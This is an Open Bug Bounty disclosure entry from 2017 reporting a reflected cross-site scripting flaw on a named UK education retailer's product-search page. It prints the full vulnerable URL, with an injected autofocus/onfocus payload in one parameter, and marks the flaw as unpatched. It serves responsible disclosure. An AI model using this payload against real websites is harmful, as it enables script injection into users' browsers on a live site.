babcock-education.co.uk XSS vulnerability

2017-04-29T13:46:00
ID OBB:229194
Type openbugbounty
Reporter Liam_Somerville
Modified 2017-05-08T07:15:00

Description

Vulnerable URL:
https://www.babcock-education.co.uk/ldp/eshop/search_products.asp?pid=23&ds;=2&producttype;=&sortby;=&keyword;=&productcode;=&pagefrom;=search_products.asp&incomplete;=&notinstock;=&hidden;=&deleteditems;=&adv;=1%22%27--!%3E%3CInput%20Autofocus%20Onfocus=confirm`OPENBUGBOUNTY`%20%3C!--//&level1;=&level2;=&level3;=&subjectid;=&searchsubjectid;=&eshop;=1&curpage;=1#
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 31.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1079915
VIP website status:| No
Check babcock-education.co.uk SSL connection:| (Grade: C+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 29 April, 2017 13:46 GMT
Vulnerability existence verified and confirmed| 1 May, 2017 06:29 GMT
Vulnerability details disclosed by researcher| 8 May, 2017 07:15 GMT